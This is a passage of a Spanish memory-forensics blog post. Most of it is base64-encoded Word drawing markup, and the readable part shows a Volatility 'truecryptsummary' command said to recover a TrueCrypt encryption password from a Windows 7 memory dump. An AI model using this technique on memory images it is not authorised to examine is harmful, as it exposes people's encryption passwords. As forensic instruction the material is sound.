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
q5AQPlrl1iCtfGzKgdNtJ+PJBI+k6XaDoiyd3kKGT3OF86lmvzpYcbIpuLsfjk+8IZ3yhwhCrNGq
KgOOiYCzg2pqzTGBw7AikZXxN1eYsrRrnkbpGErpiCYhyiqKmcxTuE7lhTr6rrCBcZftGQxqmCQr
hMNAFVjTqFY1LapGqsPSqns+k7KckTTLmmllFVU13VnMWiEvA3O2vFqRN7TKTQw5zazwaeqeT7lr
ea6b6xOKKgEGL+znqLoXKAiGauVilmpK48U0rHJ2RrVrR77Bc1S7SJEwsn4zFztnt6JGOJcD4pUq
P/DNRy2QJnlfqS3tOtjeQ4k3DKptHw6XYTj4DK7geNoH2qqirSoaXMGZM5SL9KC47WcXOQWep5QC
U8sptRxTzyn1nNLIKY2c0swpTd/TJ6pwiq8OU30vPzCFGpYdsGa9hX36v/EvAAAA//8DAFBLAwQU
AAYACAAAACEAnGZGQbsAAAAkAQAAKgAAAGNsaXBib2FyZC9kcmF3aW5ncy9fcmVscy9kcmF3aW5n
MS54bWwucmVsc4SPzQrCMBCE74LvEPZu0noQkSa9iNCr1AcIyTYtNj8kUezbG+hFQfCyMLPsN7NN
+7IzeWJMk3ccaloBQae8npzhcOsvuyOQlKXTcvYOOSyYoBXbTXPFWeZylMYpJFIoLnEYcw4nxpIa
0cpEfUBXNoOPVuYio2FBqrs0yPZVdWDxkwHii0k6zSF2ugbSL6Ek/2f7YZgUnr16WHT5RwTLpRcW
oIwGMwdKV2edNS1dgYmGff0m3gAAAP//AwBQSwECLQAUAAYACAAAACEAu+VIlAUBAAAeAgAAEwAA
AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQCtMD/xwQAA
ADIBAAALAAAAAAAAAAAAAAAAADYBAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCp3s1BwQIA
AGIGAAAfAAAAAAAAAAAAAAAAACACAABjbGlwYm9hcmQvZHJhd2luZ3MvZHJhd2luZzEueG1sUEsB
Ai0AFAAGAAgAAAAhAJJ9h+AdBwAASSAAABoAAAAAAAAAAAAAAAAAHgUAAGNsaXBib2FyZC90aGVt
ZS90aGVtZTEueG1sUEsBAi0AFAAGAAgAAAAhAJxmRkG7AAAAJAEAACoAAAAAAAAAAAAAAAAAcwwA
AGNsaXBib2FyZC9kcmF3aW5ncy9fcmVscy9kcmF3aW5nMS54bWwucmVsc1BLBQYAAAAABQAFAGcB
AAB2DQAAAAA=
" filled="f" strokecolor="red" strokeweight="1pt"/><![endif]--><!--[if !vml]--><!--[endif]--></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj10JYhLPxufpmgCiyldE2KCFm42XZiTqA3jhQT4LS52cUhBAlvRwMkJUozqkpnXBvogpknM2MP6AogxlClRgxabrHVIcTYsiG70o7R9RbCdvP4SRqYO067zNLD7P_9F00w1CRX502DFLNgO8-l51vSu75bheFPSEJFaM5kv5weQBHOPq9krRA4eWlyiA" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="606" data-original-width="790" height="491" src="https://blogger.googleusercontent.com/img/a/AVvXsEj10JYhLPxufpmgCiyldE2KCFm42XZiTqA3jhQT4LS52cUhBAlvRwMkJUozqkpnXBvogpknM2MP6AogxlClRgxabrHVIcTYsiG70o7R9RbCdvP4SRqYO067zNLD7P_9F00w1CRX502DFLNgO8-l51vSu75bheFPSEJFaM5kv5weQBHOPq9krRA4eWlyiA=w640-h491" width="640" /></a></div><br /><div style="text-align: justify;">Como se puede ver en la imagen anterior existe un proceso TrueCrypt corriendo en la máquina. TrueCrypt es un conocido software de cifrado de datos que se empleó mucho hasta 2015 año en el que se detectó una vulnerabilidad en su código y se dejó de utilizar <a href="https://www.xataka.com/basics/que-truecrypt-que-paso-que-no-seguro-utilizarlo">https://www.xataka.com/basics/que-truecrypt-que-paso-que-no-seguro-utilizarlo</a>, también debo destacar que el proceso tryuecrypt.exe en memoria, en dispositivos Windows =< a Win7 almacenaba la contraseña de cifrado en memoria y mediante el plugin de Volatility “truecryptsummary” se puede revelar dicha contraseña.</div><div><span lang="EN-US"><o:p> </o:p></span><div>vol.py -f dump --profile=Win7SP1x86_23418
truecryptsummary > truecryptsummary.txt<p></p>
<p class="MsoNormal" style="text-align: justify;"><!--[if gte vml 1]><v:rect id="Rectangle_x0020_7"
o:spid="_x0000_s1027" style='position:absolute;left:0;text-align:left;
margin-left:-.05pt;margin-top:49.25pt;width:245pt;height:8.85pt;z-index:251662336;
visibility:visible;mso-wrap-style:square;mso-height-percent:0;
mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;
mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;
mso-position-horizontal-relative:text;mso-position-vertical:absolute;
mso-position-vertical-relative:text;mso-height-percent:0;
mso-height-relative:margin;v-text-anchor:middle' o:gfxdata="UEsDBBQABgAIAAAAIQC75UiUBQEAAB4CAAATAAAAW0NvbnRlbnRfVHlwZXNdLnhtbKSRvU7DMBSF
dyTewfKKEqcMCKEmHfgZgaE8wMW+SSwc27JvS/v23KTJgkoXFsu+P+c7Ol5vDoMTe0zZBl/LVVlJ
gV4HY31Xy4/tS3EvRSbwBlzwWMsjZrlprq/W22PELHjb51r2RPFBqax7HCCXIaLnThvSAMTP1KkI
+gs6VLdVdad08ISeCho1ZLN+whZ2jsTzgcsnJwldluLxNDiyagkxOquB2Knae/OLUsyEkjenmdzb
mG/YhlRnCWPnb8C898bRJGtQvEOiVxjYhtLOxs8AySiT4JuDystlVV4WPeM6tK3VaILeDZxIOSsu
ti/jidNGNZ3/J08yC1dNv9v8AAAA//8DAFBLAwQUAAYACAAAACEArTA/8cEAAAAyAQAACwAAAF9y
ZWxzLy5yZWxzhI/NCsIwEITvgu8Q9m7TehCRpr2I4FX0AdZk2wbbJGTj39ubi6AgeJtl2G9m6vYx
jeJGka13CqqiBEFOe2Ndr+B03C3WIDihMzh6RwqexNA281l9oBFTfuLBBhaZ4ljBkFLYSMl6oAm5
8IFcdjofJ0z5jL0MqC/Yk1yW5UrGTwY0X0yxNwri3lQgjs+Qk/+zfddZTVuvrxO59CNCmoj3vCwj
MfaUFOjRhrPHaN4Wv0VV5OYgm1p+LW1eAAAA//8DAFBLAwQUAAYACAAAACEA55l2HsACAABiBgAA
HwAAAGNsaXBib2FyZC9kcmF3aW5ncy9kcmF3aW5nMS54bWysVV1P2zAUfZ+0/2D5HZoUSkdFQF1H
0SQEFWHi+eI4TTTH9mw3pPv1u7aTtmKISdv60Pra5x6f++VeXHWNIC03tlYyo+lxQgmXTBW1XGf0
2+Py6BMl1oEsQCjJM7rlll5dfvxwAbO1AV3VjCCDtDPIaOWcno1GllW8AXusNJd4VirTgEPTrEeF
gRdkbsRonCRnowZqSS/3VF/AAdmY+i+ohGLfebEA2YJFSsFmhzu9RsH+nRlmsr0xOtcr45Wzu3Zl
SF1kFDMnocEU0VF/0MPQHL3yWu8JutI0Hq/KknRYgWR6PkmQa5vRs+n4bDKZRD7eOcIQcJKmaQAw
RKTp+OS8B7Dq/g8UrLp+nwRlRjm4OJBotRco299jng4xP3CGTbIWnEx34Xv4EPvgavu0/aeod4Jh
po11N1w1xC8yalBQaC1ob62LMgZIiEYtayFCpYT0G1aJuvB7wTDr54UwpAWR0eUywY8PC687gKHl
Xf1mH5Xr8pAq131WxdYTPeMv9odRKAmLajVb1qjvFqxbgcGZwU2cPnePX6VQLxllotaUVMr8fL3n
cdi/eELJC85eRu2PDRhOifgqbUbP09NTpHPBOJ1Mx2iYw5PnwxO5aRYKo0uDqrD0eCeGZWlU86RM
Mfe34hFIhnejQGcGY+HQxiMcccbn87BmqtHgbmWucdjSUAKf98fuCYzui+Owme9UXoHmb9UoYmOV
5hunyrovYMymPxDW5W4reChgyDmXhc/oA2ZbYCdmlNuj67yvGiKwTPuybCzPte/ZWNShbtZTBnr5
wEucapy3cVAY3jS+awlgjEsXo7MVFDx2Cs7lvlH8K+g9wtXCE3rmEjtsx90TDMhIMnBHaT3eu/Ky
RMU75+Q9YdF55xFuVnLv3NRSmbcIBEbV3xzxscFjYkKr48ar1zVA+n8D/4Qf2pe/AAAA//8DAFBL
AwQUAAYACAAAACEAkn2H4B0HAABJIAAAGgAAAGNsaXBib2FyZC90aGVtZS90aGVtZTEueG1s7FlL
bxs3EL4X6H9Y7L2xZL1iI3JgyXLcxC9ESoocKYnaZcxdLkjKjm5FcuqlQIG06KEBeuuhKBqgARr0
0h9jwEGb/ogOuS9SouIHXCAobAHG7uw3w+HM7Mzs8M7dZxH1jjEXhMVtv3qr4ns4HrExiYO2/2iw
/dlt3xMSxWNEWYzb/gwL/+7Gp5/cQesjSpIhQ3w8CHGEPRAUi3XU9kMpk/WVFTECMhK3WIJjeDZh
PEISbnmwMuboBBaI6MpqpdJciRCJ/Q2QKJWgHoV/sRSKMKK8r8RgL0YRrH4wmZAR1tjxUVUhxEx0
KfeOEW37IHPMTgb4mfQ9ioSEB22/ov/8lY07K2g9Y6JyCa/Bt63/Mr6MYXy0qtfkwbBYtF5v1Jub
hXwNoHIR12v1mr1mIU8D0GgEO011sWW2Vrv1DGuA0kuH7K3WVq1q4Q35tQWdNxvqZ+E1KJVfX8Bv
b3fBihZeg1J8YwHf6Kx1tmz5GpTimwv4VmVzq96y5GtQSEl8tICuNJq1br7bAjJhdMcJX2vUt1ur
mfASBdFQRJdaYsJiuSzWIvSU8W0AKCBFksSenCV4gkYQk11EyZATb5cEIQRegmImgFxZrWxXavBf
/er6SnsUrWNkcCu9QBOxQFL6eGLESSLb/n2Q6huQs7dvT5+/OX3+++mLF6fPf83W1qIsvh0UBybf
+5+++efVl97fv/34/uW36dLzeGHi3/3y1bs//vyQeNhxaYqz716/e/P67Puv//r5pUP6JkdDEz4g
ERbePj7xHrIINujQHw/55TgGISImx2YcCBQjtYpDfk+GFnp/hihy4DrYtuNjDqnGBbw3fWop3A/5
VBKHxAdhZAH3GKMdxp1WeKDWMsw8mMaBe3E+NXEPETp2rd1FseXl3jSBHEtcIrshttQ8pCiWKMAx
lp56xo4wduzuCSGWXffIiDPBJtJ7QrwOIk6TDMjQiqaSaYdE4JeZS0Hwt2Wbvcdeh1HXrrfwsY2E
dwNRh/IDTC0z3kNTiSKXyAGKqGnwXSRDl5L9GR+ZuJ6Q4OkAU+b1xlgIF88Bh/0aTn8Aacbt9j06
i2wkl+TIJXMXMWYit9hRN0RR4sL2SRya2M/FEYQo8g6ZdMH3mP2GqHvwA4qXuvsxwZa7z88GjyDD
miqVAaKeTLnDl/cws+K3P6MThF2pZpNHVord5MQZHZ1pYIX2LsYUnaAxxt6jzx0adFhi2bxU+n4I
WWUHuwLrPrJjVd3HWGBPNzeLeXKXCCtk+zhgS/TZm80lnhmKI8SXSd4Hr5s270Gpi1wBcEBHRyZw
n0C/B/HiNMqBABlGcC+Vehgiq4Cpe+GO1xm3/HeRdwzey6eWGhd4L4EHX5oHErvJ80HbDBC1FigD
ZoCgy3ClW2Cx3F+yqOKq2aZOvon90pZugO7IanoiEp/bAc31Po3/rveBDuPsh1eOl+16+h23YCtZ
XbLTWZZMdub6m2W4+a6my/iYfPxNzRaaxocY6shixrrpaW56Gv9/39Mse59vOpll/cZNJ+NDh3HT
yWTDlevpZMrmBfoaNfBIBz167BMtnfpMCKV9OaN4V+jBj4DvmfE2EBWfnm7iYgqYhHCpyhwsYOEC
jjSPx5n8gsiwH6IEpkNVXwkJRCY6EF7CBAyNNNkpW+HpNNpj43TYWa2qwWZaWQWSJb3SKOgwqJIp
utkqB3iFeK1toAetuQKK9zJKGIvZStQcSrRyojKSHuuC0RxK6J1dixZrDi1uK/G5qxa0ANUKr8AH
twef6W2/UQcWYIJ5HDTnY+Wn1NW5d7Uzr9PTy4xpRQA02HkElJ5eU7ou3Z7aXRpqF/C0pYQRbrYS
2jK6wRMhfAZn0amoF1Hjsr5eK11qqadModeD0CrVaN3+kBZX9TXwzecGGpuZgsbeSdtv1hoQMiOU
tP0JDI3hMkogdoT65kI0gOOWkeTpC3+VzJJwIbeQCFOD66STZoOISMw9SqK2r7ZfuIHGOodo3aqr
kBA+WuXWIK18bMqB020n48kEj6TpdoOiLJ3eQoZPc4XzqWa/Olhxsim4ux+OT7whnfKHCEKs0aoq
A46JgLODamrNMYHDsCKRlfE3V5iytGueRukYSumIJiHKKoqZzFO4TuWFOvqusIFxl+0ZDGqYJCuE
w0AVWNOoVjUtqkaqw9Kqez6TspyRNMuaaWUVVTXdWcxaIS8Dc7a8WpE3tMpNDDnNrPBp6p5PuWt5
rpvrE4oqAQYv7OeouhcoCIZq5WKWakrjxTSscnZGtWtHvsFzVLtIkTCyfjMXO2e3okY4lwPilSo/
8M1HLZAmeV+pLe062N5DiTcMqm0fDpdhOPgMruB42gfaqqKtKhpcwZkzlIv0oLjtZxc5BZ6nlAJT
yym1HFPPKfWc0sgpjZzSzClN39MnqnCKrw5TfS8/MIUalh2wZr2Fffq/8S8AAAD//wMAUEsDBBQA
BgAIAAAAIQCcZkZBuwAAACQBAAAqAAAAY2xpcGJvYXJkL2RyYXdpbmdzL19yZWxzL2RyYXdpbmcx
LnhtbC5yZWxzhI/NCsIwEITvgu8Q9m7SehCRJr2I0KvUBwjJNi02PyRR7Nsb6EVB8LIws+w3s037
sjN5YkyTdxxqWgFBp7yenOFw6y+7I5CUpdNy9g45LJigFdtNc8VZ5nKUxikkUigucRhzDifGkhrR
ykR9QFc2g49W5iKjYUGquzTI9lV1YPGTAeKLSTrNIXa6BtIvoST/Z/thmBSevXpYdPlHBMulFxag
jAYzB0pXZ501LV2BiYZ9/SbeAAAA//8DAFBLAQItABQABgAIAAAAIQC75UiUBQEAAB4CAAATAAAA
AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAK0wP/HBAAAA
MgEAAAsAAAAAAAAAAAAAAAAANgEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAOeZdh7AAgAA
YgYAAB8AAAAAAAAAAAAAAAAAIAIAAGNsaXBib2FyZC9kcmF3aW5ncy9kcmF3aW5nMS54bWxQSwEC
LQAUAAYACAAAACEAkn2H4B0HAABJIAAAGgAAAAAAAAAAAAAAAAAdBQAAY2xpcGJvYXJkL3RoZW1l
L3RoZW1lMS54bWxQSwECLQAUAAYACAAAACEAnGZGQbsAAAAkAQAAKgAAAAAAAAAAAAAAAAByDAAA
Y2xpcGJvYXJkL2RyYXdpbmdzL19yZWxzL2RyYXdpbmcxLnhtbC5yZWxzUEsFBgAAAAAFAAUAZwEA
AHUNAAAAAA==
" filled="f" strokecolor="red" strokeweight="1pt"/><![endif]--><!--[if !vml]--><span style="height: 14px; left: 0px; margin-left: -1px; margin-top: 64px; mso-ignore: vglayout; position: absolute; width: 329px; z-index: 251662336;"><br /></span><!--[endif]--><!--[if gte vml 1]><v:rect id="Rectangle_x0020_6"
o:spid="_x0000_s1026" style='position:absolute;left:0;text-align:left;
margin-left:-.05pt;margin-top:7.95pt;width:245pt;height:6.35pt;z-index:251660288;
visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;
mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;
mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;
mso-position-horizontal-relative:text;mso-position-vertical:absolute;
mso-position-vertical-relative:text;v-text-anchor:middle' o:gfxdata="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
